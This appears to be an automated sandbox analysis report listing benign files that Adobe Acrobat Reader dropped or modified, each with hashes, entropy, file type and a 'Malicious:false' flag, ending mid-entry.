                                                                                                                                                                                                                                                                                Preview:2024/10/09-14:06:22.120 1788 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/10/09-14:06:22.121 1788 Recovering log #3.2024/10/09-14:06:22.122 1788 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):475
                                                                                                                                                                                                                                                                                Entropy (8bit):4.974792857895216
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:12:YH/um3RA8sqyKgpEsBdOg2Ha2caq3QYiubcP7E4T3y:Y2sRds4edMHI3QYhbA7nby
                                                                                                                                                                                                                                                                                MD5:D027FE7566557DB8D1A657AB812F40CE
                                                                                                                                                                                                                                                                                SHA1:B5736341B9DF291BC93CE58008CEF6E96A71E0E7
                                                                                                                                                                                                                                                                                SHA-256:9F88ED811C61620414A99A3F38F4D3E52590099685F24009089AA13ED0D877A7
                                                                                                                                                                                                                                                                                SHA-512:50D863A0795498648BA8561E27D556F4A5D797061A778D4588094F4897B146832F26E0572C3814DA3C4205CC9F3AC8CC5277A992818FDB8F1B5896961CF37D15
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13373057194539025","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":126446},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.6","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                                Size (bytes):475
                                                                                                                                                                                                                                                                                Entropy (8bit):4.974792857895216
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:12:YH/um3RA8sqyKgpEsBdOg2Ha2caq3QYiubcP7E4T3y:Y2sRds4edMHI3QYhbA7nby
                                                                                                                                                                                                                                                                                MD5:D027FE7566557DB8D1A657AB812F40CE
                                                                                                                                                                                                                                                                                SHA1:B5736341B9DF291BC93CE58008CEF6E96A71E0E7
                                                                                                                                                                                                                                                                                SHA-256:9F88ED811C61620414A99A3F38F4D3E52590099685F24009089AA13ED0D877A7
                                                                                                                                                                                                                                                                                SHA-512:50D863A0795498648BA8561E27D556F4A5D797061A778D4588094F4897B146832F26E0572C3814DA3C4205CC9F3AC8CC5277A992818FDB8F1B5896961CF37D15
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13373057194539025","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":126446},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.6","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):5859
                                                                                                                                                                                                                                                                                Entropy (8bit):5.24854213953629
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:96:av+Nkkl+2GAouz3z3xfNLUS3vHp5OuDzUrMzh28qXAXFP74LRXOtW7ANwE7K/2wI:av+Nkkl+2G1uz3zhfZUyPp5OuDzUwzhl
                                                                                                                                                                                                                                                                                MD5:114175F60957E4C5FA57DE6C3C53370D
                                                                                                                                                                                                                                                                                SHA1:0B967F5969D27FDF52F57008DF2BD0047CA1186E
                                                                                                                                                                                                                                                                                SHA-256:7DD20112CDE020F7F4EFD295B898C735CF3946820FE99C233F165C388D0BC0E0
                                                                                                                                                                                                                                                                                SHA-512:EDEAF0EB8563D587FADF940848D9E01EEF948DF17A4A80B0D0929F5402CB5D6B9DE90973E04D93EAF8F43AE1227FFDFCAEEC051514DF61487FBED9CCF72C2B34
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:*...#................version.1..namespace-.X.Bo................next-map-id.1.Pnamespace-c291b69d_46f8_4b09_b54e_d05df8a1271d-https://rna-resource.acrobat.com/.0.>j.r................next-map-id.2.Snamespace-63b958a8_6f71_4fde_913c_6518794b9fd1-https://rna-v2-resource.acrobat.com/.1.J.4r................next-map-id.3.Snamespace-37e4c694_2a8d_4b31_9eb8_e65c5f9e16d5-https://rna-v2-resource.acrobat.com/.2..J.o................next-map-id.4.Pnamespace-d7426d52_3038_4cd9_b9cc_897232425509-https://rna-resource.acrobat.com/.3..M.^...............Pnamespace-c291b69d_46f8_4b09_b54e_d05df8a1271d-https://rna-resource.acrobat.com/..d.^...............Pnamespace-d7426d52_3038_4cd9_b9cc_897232425509-https://rna-resource.acrobat.com/.u..a...............Snamespace-63b958a8_6f71_4fde_913c_6518794b9fd1-https://rna-v2-resource.acrobat.com/..`aa...............Snamespace-37e4c694_2a8d_4b31_9eb8_e65c5f9e16d5-https://rna-v2-resource.acrobat.com/`v.Yo................next-map-id.5.Pnamespace-30587558_ed88_4bd8_adc0_
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):330
                                                                                                                                                                                                                                                                                Entropy (8bit):5.190988478525838
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6:ppt+q2PN72nKuAl9OmbzNMxIFUt886uSZmw+8PtVkwON72nKuAl9OmbzNMFLJ:ppovVaHAa8jFUt882/+8PT5OaHAa84J
                                                                                                                                                                                                                                                                                MD5:6AF5C5D299860F791560616802092CA3
                                                                                                                                                                                                                                                                                SHA1:F3A0263200EB69E51950E884F359F37AB718503F
                                                                                                                                                                                                                                                                                SHA-256:5B84A4E3CB9DE97E54ACDDDF353D3D4228AB696EB1951A84B00609BF89F452AF
                                                                                                                                                                                                                                                                                SHA-512:FA84F0D61849731B86BC12712329E258BA2E15A191448CA7BBCFB7CD4AD6246CB1AA9EEB71C835B82A5D67DF6FEF5553646AE57CA01F0541E14E88466D0BC353
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:2024/10/09-14:06:22.442 1788 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/10/09-14:06:22.445 1788 Recovering log #3.2024/10/09-14:06:22.448 1788 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):330
                                                                                                                                                                                                                                                                                Entropy (8bit):5.190988478525838
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6:ppt+q2PN72nKuAl9OmbzNMxIFUt886uSZmw+8PtVkwON72nKuAl9OmbzNMFLJ:ppovVaHAa8jFUt882/+8PT5OaHAa84J
                                                                                                                                                                                                                                                                                MD5:6AF5C5D299860F791560616802092CA3
                                                                                                                                                                                                                                                                                SHA1:F3A0263200EB69E51950E884F359F37AB718503F
                                                                                                                                                                                                                                                                                SHA-256:5B84A4E3CB9DE97E54ACDDDF353D3D4228AB696EB1951A84B00609BF89F452AF
                                                                                                                                                                                                                                                                                SHA-512:FA84F0D61849731B86BC12712329E258BA2E15A191448CA7BBCFB7CD4AD6246CB1AA9EEB71C835B82A5D67DF6FEF5553646AE57CA01F0541E14E88466D0BC353
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:2024/10/09-14:06:22.442 1788 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/10/09-14:06:22.445 1788 Recovering log #3.2024/10/09-14:06:22.448 1788 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                                                                File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):65110
                                                                                                                                                                                                                                                                                Entropy (8bit):3.9853320574894586
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:384:Gr7HxknSUAuf0lHav5x0bPN3DtuOV9nGkowYLHeMgZbb4Gdh/q8jTJ:QenSafSHaRAzAMtVYL+f94Gdx3vJ
                                                                                                                                                                                                                                                                                MD5:FD0F6C73E75607F7A083D6A6AF90209F
                                                                                                                                                                                                                                                                                SHA1:801A9A1EA5E30A4E29BDBE5A2A5B55D014CC2618
                                                                                                                                                                                                                                                                                SHA-256:493AF4576EDB091414C4EFB90C896B034EC5534A00AD1C1B40C8618B28E2CAC8
                                                                                                                                                                                                                                                                                SHA-512:49FFBBA224A9DFDE042623559F4AD215C9C125C269E2A55AC3E282930B6FF350B978A0EB6EA147647A39C0CBA44B12F9DDD1A45CAB1F2D2D3E8214B2B0612C1C
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 11, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):86016
                                                                                                                                                                                                                                                                                Entropy (8bit):4.444871950547992
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:384:ye6ci5twiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:mHs3OazzU89UTTgUL
                                                                                                                                                                                                                                                                                MD5:E1AF945DC6191CC3BEBF360B61838B5F
                                                                                                                                                                                                                                                                                SHA1:C78CF06F8FB30559756CA1D6C63BFC77E7F50FA9
                                                                                                                                                                                                                                                                                SHA-256:0F7A1B607808982A5AEBD9DB446F00ACEE8945B3681D8BE12FD788F4B8B238E3
                                                                                                                                                                                                                                                                                SHA-512:BA60774AF8250637BDA3D7BFF0ADA0B832CEBF154ECD2B55DBB7547294C5E77FB76B3AA1D14C7E64A6345998D9B6A2962C1C05998BF40210D8EF3D08E24165B6
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                                                                File Type:SQLite Rollback Journal
                                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                                Size (bytes):8720
                                                                                                                                                                                                                                                                                Entropy (8bit):3.7671973323487955
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:48:7MgJioyVYNfioy5voy1C7oy16oy17NaKOioy1noy1AYoy1Wioy1oioykioyBoy1q:7TJuCP7XjBiWb9IVXEBodRBkH
                                                                                                                                                                                                                                                                                MD5:4B16A6424FB232F9EE300B2847F0A516
                                                                                                                                                                                                                                                                                SHA1:308447567027D7A4642E6F39CE4A5D2CD473A292
                                                                                                                                                                                                                                                                                SHA-256:8CA8F6734A8F430919EB891382FAEC21F8F11641DFC3C13B6018FCCDF3B5CA87
                                                                                                                                                                                                                                                                                SHA-512:0DDF40BC215CE7C83F94B2DF6E74BB2E71D677C596C400166139BF54BDCDE09D01814F4CCDBB145D2935A260009F72D545E01458E27DE0E3DC50BBB31B3807B0
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:.... .c.......2................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b.r.l...t...}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                                                                File Type:Certificate, Version=3
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):1391
                                                                                                                                                                                                                                                                                Entropy (8bit):7.705940075877404
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                                                                                                                                                                                                                                MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                                                                                                                                                                                                                                SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                                                                                                                                                                                                                                SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                                                                                                                                                                                                                                SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):192
                                                                                                                                                                                                                                                                                Entropy (8bit):2.764745823915414
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:kkFkl+nfQ2M/tfllXlE/HT8kbltNNX8RolJuRdxLlGB9lQRYwpDdt:kKnfQ2seT8uTNMa8RdWBwRd
                                                                                                                                                                                                                                                                                MD5:5C17BE17A02335BF1F68A96B6B779321
                                                                                                                                                                                                                                                                                SHA1:BE8C15019D058F83B12C362444D84ED960EAE33A
                                                                                                                                                                                                                                                                                SHA-256:1A4AF4239A5E7A4A185DE4F1B870951D946D1144DB7D2A9C545DC58E72E09A9E
                                                                                                                                                                                                                                                                                SHA-512:2C73A6375AB3971AA06C4B3A91C2CC640A9443E47B991A707995B7049BE05124001CFC0D6782A55A8C9BDB59B50B483C8275FB0F980BBCFBEF9839A95F25C180
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:p...... ........M.".u...(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):227002
                                                                                                                                                                                                                                                                                Entropy (8bit):3.392780893644728
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:1536:qKPC4iyzDtrh1cK3XEivK7VK/3AYvYwgF/rRoL+sn:XPCaJ/3AYvYwglFoL+sn
                                                                                                                                                                                                                                                                                MD5:265E3E1166312A864FB63291EA661C6A
                                                                                                                                                                                                                                                                                SHA1:80DFF3187FF929596EB22E1DB9021BAD6F97178C
                                                                                                                                                                                                                                                                                SHA-256:C13E08B1887A4E44DC39609D7234E8D732A6BC11313B55D6F4ECFB060CD87728
                                                                                                                                                                                                                                                                                SHA-512:48776A2BFE8F25E5601DCC0137F7AB103D5684517334B806E3ACF61683DD9B283828475FC85CE0CBE4E8AF88E6F8B25EED0A77640E2CFFF2CC73708726519AFA
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:Adobe Acrobat Reader (64-bit) 23.6.20320....?A12_AV2_Search_18px.............................................................................................................KKK KKK.KKK.KKK.KKK.KKK.KKK@........................................KKK`KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.............................KKKPKKK.KKK.KKK.KKK.........KKKPKKK.KKK.KKK.........................KKK.KKK.KKK.KKK0....................KKK.KKK.KKK.KKK`....................KKK`KKK.KKK.............................KKK@KKK.KKK.....................KKK.KKK.KKK0................................KKK.KKK.....................KKK.KKK.....................................KKK.KKK.....................KKK.KKK.KKK0................................KKK.KKK.....................KKK`KKK.KKK.............................KKK@KKK.KKK.....................KKK.KKK.KKK.KKK@....................KKK.KKK.KKK.KKK`........................KKKPKKK.KKK.KKK.KKK.........KKKPKKK.KKK.KKK.KKK.............................KKK`KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):295
                                                                                                                                                                                                                                                                                Entropy (8bit):5.34024287625317
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6:YEQXJ2HXHUZOyDXVqGnZiQ0YGTYxoAvJM3g98kUwPeUkwRe9:YvXKXbQXFcTYOGMbLUkee9
                                                                                                                                                                                                                                                                                MD5:92F71FF490282C40E1109D4968350001
                                                                                                                                                                                                                                                                                SHA1:61A126EC1C5E70495F905CB252DC9C6F80C20C8D
                                                                                                                                                                                                                                                                                SHA-256:BA5DF8D5C4DC1FA8C97D4C1D04C0E378588CEC453A9BD39EDD2ADAD0ECD48AAF
                                                                                                                                                                                                                                                                                SHA-512:0B2BB58F27B9A440289DF6CDC6D2941F680A459533EAE035A6D0CB4205A3E4636C5BAB2DC697C5055C0EB8EAD0DEC68DA4AF322E232A2DDC8E94DE3339078ABF
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:{"analyticsData":{"responseGUID":"0138531c-40c5-4761-a3af-f2047a58ac1e","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1728676889343,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):294
                                                                                                                                                                                                                                                                                Entropy (8bit):5.292125416030942
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6:YEQXJ2HXHUZOyDXVqGnZiQ0YGTYxoAvJfBoTfXpnrPeUkwRe9:YvXKXbQXFcTYOGWTfXcUkee9
                                                                                                                                                                                                                                                                                MD5:F9EE4A5D11AA7E85FA9B457C6683CB23
                                                                                                                                                                                                                                                                                SHA1:6F04CEFAEF0803C50EB43460A6889EF9BAE05224
                                                                                                                                                                                                                                                                                SHA-256:4191DCAF81D029B35335BA1F43388CCE7FCC31F46DBFD3CF2592019E81212C1B
                                                                                                                                                                                                                                                                                SHA-512:84F5458C925B727911B349B8A29816DA0A16BE62EB4883DA9EED53CB4D2D7A91899A0A9CED0392B2805845A2145A236C6E72A2734CB40D142B58EA1617C6AE8A
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:{"analyticsData":{"responseGUID":"0138531c-40c5-4761-a3af-f2047a58ac1e","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1728676889343,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):294
                                                                                                                                                                                                                                                                                Entropy (8bit):5.269975509608011
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6:YEQXJ2HXHUZOyDXVqGnZiQ0YGTYxoAvJfBD2G6UpnrPeUkwRe9:YvXKXbQXFcTYOGR22cUkee9
                                                                                                                                                                                                                                                                                MD5:DFF1C2EB7905E3CB561014234904635F
                                                                                                                                                                                                                                                                                SHA1:6FD11CD89F205DD428897C276E6F950C3613E944
                                                                                                                                                                                                                                                                                SHA-256:C13A22EEB4C68F43AE5574CADD374031FECAB1605E193D5D90F57B4C61604B30
                                                                                                                                                                                                                                                                                SHA-512:1F655C82136AB0FDD176EC3098430A8ABDCCE72E753C5CE47BB1E42D651F33310414821FE928B37407E60B3D4829F0E48056F50CAF20681C08AE93716D17EF33
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:{"analyticsData":{"responseGUID":"0138531c-40c5-4761-a3af-f2047a58ac1e","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1728676889343,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):285
                                                                                                                                                                                                                                                                                Entropy (8bit):5.319454205949949
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6:YEQXJ2HXHUZOyDXVqGnZiQ0YGTYxoAvJfPmwrPeUkwRe9:YvXKXbQXFcTYOGH56Ukee9
                                                                                                                                                                                                                                                                                MD5:ED6C6EF3609E72B2214625A1ACAF8B7B
                                                                                                                                                                                                                                                                                SHA1:DE2A27EB6220CC660110AA4CF974C6B2AE9E4108
                                                                                                                                                                                                                                                                                SHA-256:5B7498BE3A192B6DE0F977A8DCD6D304B3981F8726C3A49B9A9AEBAF80862BD3
                                                                                                                                                                                                                                                                                SHA-512:3BFEAE738E9226466576E0FE2431248A21FFC1DE5792FE399918F708D1A8D48D9A48FA21E35C6ADAF0F12B0828E2DF24BBEB1DF38613ED1CC1D3752B7F8E41C7
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:{"analyticsData":{"responseGUID":"0138531c-40c5-4761-a3af-f2047a58ac1e","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1728676889343,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):1091
                                                                                                                                                                                                                                                                                Entropy (8bit):5.689367564562046
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:24:Yv6XbC6gpLgE7cgD6SOGtnnl0RCmK8czOCYvSE:YvFhgs6SraAh8cvYKE
                                                                                                                                                                                                                                                                                MD5:0BA69FDBBFE4CCDA5612DA6FFB8FDAFD
                                                                                                                                                                                                                                                                                SHA1:C8FDAB1F1DD4DB0534971EF5A9B76390A069FEC1
                                                                                                                                                                                                                                                                                SHA-256:240E4AA3407F4B14C74D3F71D127F4E6E95855AF8671C2C2AEC03658CC6D1A95
                                                                                                                                                                                                                                                                                SHA-512:F3811F75A805018DD5F69280AF69CE846150ED6D92F7F5FC42145C04F3E57BA215AF8E5350B05B52C995FA7A6731D836598FBD0004248EAF3A9199583DFD4884
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:{"analyticsData":{"responseGUID":"0138531c-40c5-4761-a3af-f2047a58ac1e","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1728676889343,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"89628_281075ActionBlock_2","campaignId":89628,"containerId":"1","controlGroupId":"","treatmentId":"67a3a874-888f-4d96-9f3d-26e70c3e0be1","variationId":"281075"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkNvbnZlcnQgUERGIGZpbGVzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNhdElkIjoiUkdTMDM1MS1FTlUtQ2hhbGxlbmdlcjIifQ==","dataType":"ap
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):1050
                                                                                                                                                                                                                                                                                Entropy (8bit):5.6526821185038685
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:24:Yv6XbC6yVLgEF0c7sbnl0RCmK8czOCYHflEpwiVF:YvJFg6sGAh8cvYHWpwE
                                                                                                                                                                                                                                                                                MD5:CEDCA485269430DF97B6482C81ED272C
                                                                                                                                                                                                                                                                                SHA1:3E4844B3D828BAE683C225FE77F0CE196ABB4ED2
